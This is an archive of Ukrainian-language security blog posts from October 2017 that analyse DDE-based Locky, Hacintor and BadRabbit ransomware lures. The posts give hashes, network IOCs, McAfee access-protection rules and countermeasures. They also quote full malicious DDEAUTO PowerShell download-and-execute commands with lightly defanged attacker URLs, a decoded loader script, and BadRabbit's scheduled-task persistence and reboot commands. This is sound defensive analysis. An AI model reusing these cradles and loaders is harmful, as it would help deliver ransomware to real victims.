Archive | October 2017

DDE_Locky_311017

Доброго дня, панове.

Вчора вночі була зафіксована чергова спроба доставки Locky Ransomware через документи з DDE.

Схему активації я вже розбирав детально тому зосередимося на маркерах та контрзаходах.

Рівень загрози – усе ще високий, але не через складність атаки, а через те, що ще не всі організації вжили заходів щодо блокування DDE.

Для організацій, що прислухалися до моїх попередніх рекомендацій , рівень загрози – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що обидва payload вже детектуєються по GTI.

Нагадую, що механізм DDE може бути використаний для запуску команд не лише в Word та Excel а й у Outlook.

Користувачам McAfee VSE/ENS раджу ще раз ознайомитися із простими правилами по блокуванню DDE.

Схема атаки:

email > .doc (DDE) > запитання1? > запитання2? > CMD > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

Маркери IOC:

Обидва файли що були передані на аналіз відносяться до однієї кампанії, посилання з обох ведуть на один і той самий список URL для завантаження payload1

Документ#1

File name Invoice 081839882 10.31.2017
File size 16.74 KB
SHA-256 7a81c498fa2c4bead2792bfa636d2c32f9f630b92c0aa1cceacfb5403aeb0909

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\localesynavesalquiler[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

Документ#2

File name Invoice 091312820 10.31.2017
File size 16.73 KB
SHA-256 66c1be89ca96319d92600aefeecade28ecf312682d94846032ad8fa3635a1575

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\lopezfranco[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

JAB1AHIAbABzACAAPQAgACIAaAB0AHQAcAA6AC8ALwByAG8AcwBpAGEAdQB0AG8AcwB1AGwAaQAuAGgAdQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGMAcQBhAHEAdQBhAGwAaQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGQAaQBlAHQAZQByAGQAdQByAHMAdABpAGcALgBkAGUALwBIAFUAZwBmAHIAcwBlADcAIgAsACIAaAB0AHQAcAA6AC8ALwBlAGQAaQBmAGkAYwBpAG8AZQB4AHAAbwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AZgBpAHIAcwB0AC0AcABhAHIAaQBzAC0AcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AaABvAHQAZQBsAHgAYQBnAHUAYQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQAcgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdABpADQALgBlAHgAZQAiAAkADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAZgBwAA0ACgAJACQAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAZgBwACkADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBwAA0ACgAJAGIAcgBlAGEAawANAAoAfQANAAoAQwBhAHQAYwBoAA0ACgB7AA0ACgAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAA0ACgB9AA0ACgANAAoACQANAAoAfQA=

Якщо декодувати отримаємо:

$urls = "h11p:\rosiautosuli.hu/HUgfrse7","h11p:\cqaqualite[.]com/HUgfrse7","h11p:\dieterdurstig.de/HUgfrse7",
"h11p:\edificioexpo[.]com/HUgfrse7","h11p:\first-paris-properties[.]com/HUgfrse7","h11p:\hotelxaguate[.]com/HUgfrse7" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\hti4.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Цього разу, на відміну від попередніх скрипт містить цілих 6 посилань на проміжний payload.

Для нас, з точки зору захисту систем, важливе те, що запуск цієї команди призводить до завантаження основного тіла з одної із шести переданих адрес та запис тіла у каталог %temp%

Filename      HUgfrse7      >> tmp\hti4.exe
Size            263KiB (268992 bytes)
SHA256      42c403e7c6e811938b843c9ec915b1190ab7095b1451416ba5e65ff530d6d787

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

hti4.exe > h11p://spooner-motorsport[.]com/UIeu6fgue63

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename        23lfo837.exe
Size               597KiB (610816 bytes)
SHA256          ad0a072948cd6dfa2bd7aa79931b0522084ad8d2b9b4e119b4b9c6ef4a1ae89c

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Детект по GTI

Робота правила Access Protection

Додаткові (вбудовані) правила Acces Protection які могли би зупинити інфікування

(перед запуском DDE навмисне були переведені в режим LogOnly)

Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE15\WINWORD.EXE C:\WINDOWS\SYSWOW64\CMD.EXE User-defined Rules:_DDE_BLK_1(cmd) Action blocked : Read
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 91.142.213.150:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\support C:\USERS\OPERATOR\DESKTOP\P2.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси (політики Access Protection)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

91.142.213.150:80 HTTP 139 localesynavesalquiler[.]com GET /kdjsw23FGS HTTP/1.1
89.140.72.153:80 HTTP 129 lopezfranco[.]com GET /kdjsw23FGS HTTP/1.1

перебір джерел проміжного payload

87.229.45.38:80 HTTP 127 rosiautosuli[.]hu GET /HUgfrse7 HTTP/1.1
216.250.115.36:80 HTTP 126 cqaqualite[.]com GET /HUgfrse7 HTTP/1.1 
88.80.210.150:80 HTTP 128 dieterdurstig[.]de GET /HUgfrse7 HTTP/1.1
94.23.221.122:80 HTTP 128 edificioexpo[.]com GET /HUgfrse7 HTTP/1.1
151.80.157.121:80 HTTP 138 first-paris-properties[.]com GET /HUgfrse7 HTTP/1.1

завантаження кодованого тіла Locky

77.72.150.42:80   HTTP 147 spooner-motorsport[.]com GET /UIeu6fgue63 HTTP/1.1

Контрзаходи:

  • Заборона створення дочірніх процесів для додатків MS Office
  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

AP vs DDE & macros

Доброго вечора, панове.

Ми продовжуємо фіксувати активні спроби по доставці шкідливого коду через документи із DDE.

Не дивлячись на те, що поки це відлуння кампаній, payload яких націлені на інші країни,

ми повинні бути готовими до спроби використання DDE у цільових атаках на українські організації.

Також, варто звернути увагу, що експлуатація DDE поширюється не лише на Word та Excel, але й на Outlook (запрошення або пересилка повідомлення) та PowerPoint.

 

Вирішив поділитися з вами прикладами правил Access Protection для захисту від DDE та макросів.

Мої політики є оптимізованою версією запропонованих інженерами McAfee і будуть корисні перш за все користувачам McAfee VSE/ENS.

Але, якщо у вас в організації впроваджено інше рішення для захисту кінцевих точок – спробуйте реалізувати по аналогії.

Для тих, хто вже реалізував захист за рахунок групових політик – переконайтеся, що ви врахували усі шляхи (system32, sysWOW64).

 

Чому виникає потреба дописати пару додаткових правил?

Я вже давно рекомендую блокувати створення та запуск нових *.exe файлів у каталозі профілю. Це універсальний захист від 90% атак.

Але таке правило підходить далеко не всім, тому ось вам приклад як заблокувати спробу довантаження шкідливого коду через DDE або макрос у документі.

Нагадую принцип активації приманки DDE/macros

Схема атаки DDE/macro_powershell:

email > .doc > WINWORD > CMD > powershell > GET ... > %temp%\*.exe

Головна ідея правил, які я хочу вам запропонувати, це блокувати запуск дочірніх процесів для додатків MS Office.

Правила Access Protection:

Перше правило забороняє додаткам MS Office виклик CMD.exe

За нормальних умов створення/редагування документу не повинне призводити до передачі команд на CMD.

(!) важливий момент – зверніть увагу, що додатки можуть бути прописані по імені, а процес, який забороняємо викликати – через Sys* (щоб врахувати обидва каталоги)

Зауважте також, що це правило дозволяє блокувати макроси націлені на виклик не лише powershell але й WSCript.exe (якщо ви не дезактивували його через реєстр)

Правило #1 для VSE

Name: _DDE_BLK1(cmd) 
Process to include: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Processes to exclude: -
File or folder name to block: C:\Windows\Sys*\cmd.exe
File actions to prevent:
+ Read
+ Write
+ Execute

Друге правило про всяк випадок, якщо буде знайдено спосіб виклику PowerShell без залучення CMD.

(!) знову важливий момент – а процес, який забороняємо викликати – через повний шлях із двома символами підстановки * (щоб врахувати обидва каталоги sys та різні версії)

Правило #2 для VSE

Name: _DDE_BLK_2(ps)
Process to include: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Processes to exclude: -
File or folder name to block: C:\Windows\Sys*\WindowsPowerShell\*\powershell.exe
File actions to prevent:
+ Read
+ Write
+ Execute

Одне правило для ENS

Name:  _DDE_BLK
Executables: EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE, WINWORD.EXE
Subrule: _BLK_child_proc 
Operations:
+ Write
+ Execute
+ Read
Targets: (include)
C:\Windows\Sys*\cmd.exe
C:\Windows\Sys*\WindowsPowerShell\*\powershell.exe

Також нагадую інші способи захисту від використання приманок типу MS Office:

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Будьте уважні та обережні!

VR

IOC_badrabbit_241017

Доброї ночі, панове.

Вчорашню паніку і проблеми викликала кампанія з розповсюдження фейкових Flash PLayer Update яку охрестили #BadRabbit

Рівень загрози – реально низький. Запуск і виконання вимагають прав Адміністратора.

Це кампанія з розсилки ransomware який використовує схожий код на Petya_A.

Розповсюдження по мережі – через SMB (EthernalBlue/MS17-010 не підтверджується – в код зашитий перелік тупих обліковиї даних + можливо використання Mimikatz для отримання логінів та паролей, використання вразливості SMB не підтверджується.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що dropper та payload вже детектуются по GTI.

Схема атаки:

URL > script > fake FlashUpdate > GET php (exe) > %temp%\*.exe > C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

Маркери IOC:

Скомпрометовані сайти містили скрипти на сповіщення про начеб-то необхідність оновлення FlashPlayer

Якщо жертва погоджувалась відбувалось завантаження dropper з сайт (зараз вже недоступний)

h11p:///1dnscontrol[.]com/flash_install.php   5.61.37.209

 

File name flash_install.php 
File size 431.54 KB
SHA-256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

Ще раз - його запуск вимагає адмін привілеїв!!!

Це означає що при його запуску іде віконце UAC і користувач підтверджує що йому це потрібно.

Достатньо однієї жертви і не закритої вразливості SMB.

Після запуску видобуває з себе dll за шляхом

C:\Windows\infpub.dat

запускає через rundll32

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

закріплює себе через системний планувальник

schtasks  /Delete /F /TN rhaegal

schtasks  /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 2361074427 && exit”

 

File name dispci.exe
File size 139.5 KB
HA-256 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

додає задачу на перезавантаження

schtasks  /Create /SC once /TN drogon /RU SYSTEM /TR “C:\Windows\system32\shutdown.exe /r /t 0 /f” /ST 13:40:00

та запускає процес перебору локальних IP систем-сусідів на наявність вразливості SMB

“C:\Windows\8FA9.tmp” \\.\pipe\{42882875-162C-4F72-B1CD-0F1D1C1428C1}

Спершу шифруються файли по масці за розширенням, потім перезавантаження системи задачею.

Після перезавантаження MBR затирається.

Все досить тупо, примітивно і жодних слідів складної атаки

Що можна було зробити аби уникнути інфікування ?

  1. Запровадити веб фільтрацію (ENS WebControl або MWG + GTI)
  2. Заборонити користувачам самотужки встановлювати додатки
  3. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)
  4. Встановити оновлення MS17-010

Мережеві IOC:

завантаження dropper badrabbit

5.61.37.209:80   HTTP 157 1dnscontrol[.]com GET /flash_install.php HTTP/1.1 (вже недоступний)

Контрзаходи:

  • Перевірка журналів задач на наявність rhaegal та drogon
  • Запровадження механізмів веб-фільтрації (ENS WebControl або MWG + GTI)
  • Позбавлення користувачів адміністративних привілеїв
  • Використання Noscript або механізмів Web Gateway
  • Видалення FlashPLayer там де він не потрібен по роботі
  • Встановлення виправлень вразливості SMB
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Додаткова інформація та джерела:

  1. ‘BadRabbit’ Ransomware , McAfee
  2. roycewilliams/badrabbit-info.txt
  3. #BadRabbit Yara Rule
  4. MS – Ransom:Win32/Tibbar.A

P.S.

Фахівцям державних організацій до уваги – від такого вектору розповсюдження варіант “вимкнути поштові сервери” не рятує.Почніть вже займатися менеджментом вразливостей і відберіть у користувачів права.. І заблокуйте в кінці кінців запуск із каталогу профілю!
Будьте уважні та обережні!

VR

DDE_Locky

Чув дзвін та не знаю де він…
Зразок Locky який доставляли сьогодні через механізм DDE не був націлений на українські системи.
Принаймні завантажувати основну шифруючу частину для мене він відмовився – це все відлуння західних кампаній
Люди, котрі дослухалися до моїх рекомендацій можуть спати спокійно.
Люди у яких GTI працює – теж, бо payload детектиться по GTI
Нагадую що Locky дає ось таку картинку:
А сьогоднішню (ой вже вчорашню паніку викликала кампанія #BadRabbit – fake flash update) – про неї буде наступний допис
А це в свою чергу означає що зразки документів із DDE не мають відношення до вчорашнього інциденту.
DDE окремо, а BadRabbit – окремо.
Але про всяк випадок дам вам деталі по всім DDE документам-приманкам які мені надсилали, коротко
Invoice_file_63539
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr
75.98.175.70 80 HTTP 129 transmercasa[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1
зразок описаний в повідомленні CERT_UA
Invoice_file_06565.doc
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr

87.106.69.81 80 HTTP 122 urcho[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1

зразки з минулого тижня - блокуйте DDE бо посилань згенерують тисячі тисяч
I_213380.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e "  

I_303643.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_489192.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_535073.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

DC0003342.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://pragmaticinquiry.org/hjergf76');powershell -e $e "  

20170927_954285.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://sene-gal.de/cijweh78fDFA');powershell -e $e "  

- крайні два це вже не Locky а Hacintor але різниці особливої немає
Блокуйте DDE і створення екзешників в %temp%

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

 

MS Office DDE як елемент доставки ШПЗ

IOC_Locky(DDE)_191017

Вчора на аналіз мені передали перший зразок документу-приманки, який використовує DDE для запуску процесу доставки Locky Ransomware.

Механізм Dynamic Data Exchange (DDE) є протоколом який дозволяє передачу даними між додатками. Він може бути застосований для створення документу Word чи Excel, при відкритті якого буде виконуватися довільний код. Вперше про практичне використання DDE було опубліковано ще 9/10/17. Це схоже на спосіб із OLE з яким ми уже мали справу (див JAR_OLE та JS_OLE), але замість вбудованого об’єкту при використанні DDE в документ “зашивається” команда на виконання тої чи іншої дії. Чому це становить небезпеку? В даному випадку в документі немає макросу, отже він має високі шанси пройти механізми фільтрації.

Рівень загрози – високий. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload вже детектуєтся по GTI.

Трохи аналітики:

В даному випадку зловмисники застосували DDE для обходу фільтрів пошти.

Для обходу блокування систем, що розповсюджують був введений проміжний список (перша команда powershell).

Для ускладнення виявлення кінцевої мети був введений проміжний downloader який оцінює систему і може не продовжити роботу.

(!)Цей зразок Locky має вбудовану можливість розповсюдження по локальній мережі через вразливість SMB (подібно до WannaCry)

Схема атаки:

email > .doc (DDE) > powershell > GET URL list > GET downloader > %temp%\*.exe > GET encoded payload > %temp%\*.exe

Маркери IOC:

File name I_141268.doc
SHA-256 4a7f805f6b8fec64d3cf07c02a1d200c703ce4cc6ddf2dabd56ad9d6c936c603
File size 13.03 KB

При відкритті файлу користувач бачить два повідомлення-попередження про “відновлення зв’язків”:

Якщо увімкнути відображення форм то можна побачити саму команду:

Якщо жертва натискає “Ок” в фоні winword.exe створює дочірній процес cmd та через нього передає команду на powershell:

WINWORD.EXE /n "C:\Users\operator\Desktop\I_213380.doc" /o "u" 

cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -e DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOg...==

Якщо декодувати отримаємо:

$urls = "h11p://shamanic-extracts.biz/eurgf837or","h11p://centralbaptistchurchnj.org/eurgf837or","","h11p://conxibit.com/eurgf837or" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Запуск цієї команди призводить до завантаження основного тіла з одної із трьох переданих адрес та запис тіла у каталог %temp%

File name eurgf837or  >>  temp\rekakva32.exe 
SHA-256 d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4
File size 113.75 KB

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

rekakva32.exe > h11p://hair-select.jp/fef44gddd.enc

File name fef44gddd.enc
SHA-256 6686965dc309055937e048e9bd13e3cbb5a97a550e2af7d86914f9241e5b033e
File size 636 KB

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename  5l46zw33.exe
SHA-256 4c054127056fb400acbab7825aa2754942121e6c49b0f82ae20e65422abdee4f
File size 636 KB

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширрення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

66.36.173.246:80    HTTP 135 ryanbaptistchurch.com GET /KJHDhbje71 HTTP/1.1

перебір джерел проміжного payload

176.103.130.130:80 HTTP 135 shamanic-extracts.biz GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 140 centralbaptistchurchnj.org GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 126 conxibit.com GET /eurgf837or HTTP/1.1

завантаження кодованого тіла Locky

180.222.185.74:80   HTTP 157 hair-select.jp GET /fef44gddd.enc HTTP/1.1

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Додаткові джерела по темі DDE

  1. Microsoft Office Attack Runs Malware Without Needing Macros
  2. Malware delivered via Necurs botnet by DDE feature in Microsoft Word
  3. How to protect yourself from exploits in Office programs
VR

Еволюція скриптів

До того, що скрипти-приманки можуть містити кілька зпасних посилань ми вже звикли.

Також звикли до перевірки Public IP та вибору з двох гілок завантажень.

Сьогодні ботнет Necurs розповсюджував новий варіант VBS скрипта, активація кого призводила до завантаження payload лише за певних умов:

File name: Invoice 89533683 10.18.2017.vbs
SHA-256: f166c84f7b732c380fd4a73540eec12d74290a04155edad7a1f4848811090867
File size 10.37 KB

Скрипт виконує збір параметрів про ОС та надсилає їх через POST запит

"POST", "http://haddownding.net/trtrtr.php",false [163.172.153.154]

В залежності від відповіді на цей запит скрипт або отримує адресу на завантаження payload або ж завершується.

Скрипт який потрапив мені сьогодні до рук буув орієнтований на системи з двох країн

так машини із США отримували
niv785yg _ Locky
Filename niv785yg
Size 623KiB (637952 bytes)
SHA256 64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484
dbatee[.]gr/niv785yg
goliathstoneindustries[.]com/niv785yg
3overpar[.]com/niv785yg
pciholog[.]ru/niv785yg
disfrance[.]net/p66/niv785yg
а системи з Великобританії
iuty56g _ Trickbot
Filename iuty56g.exe
Size 393KiB (401920 bytes)
SHA256 9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b
envi-herzog[.]de/iuty56g
pac-provider[.]com/iuty56g
pesonamas.co[.]id/iuty56g
disfrance[.]net/p66/iuty56g

Природньо що на моїй тестовій системі скрипт завершився одразу.

Дані про джерела були взяті з блогу My Online Security

Варто бути готовим до того, що схожі скрипти перепишуть та переорієнтують на український сектор.

Тому краще заздалегіть вжити відповідних заходів, а саме:

Контрзаходи: (прості але дієві)

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесів WScript.exe, CScript.exe, Powershell.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й) – радикально проте раз і назважди
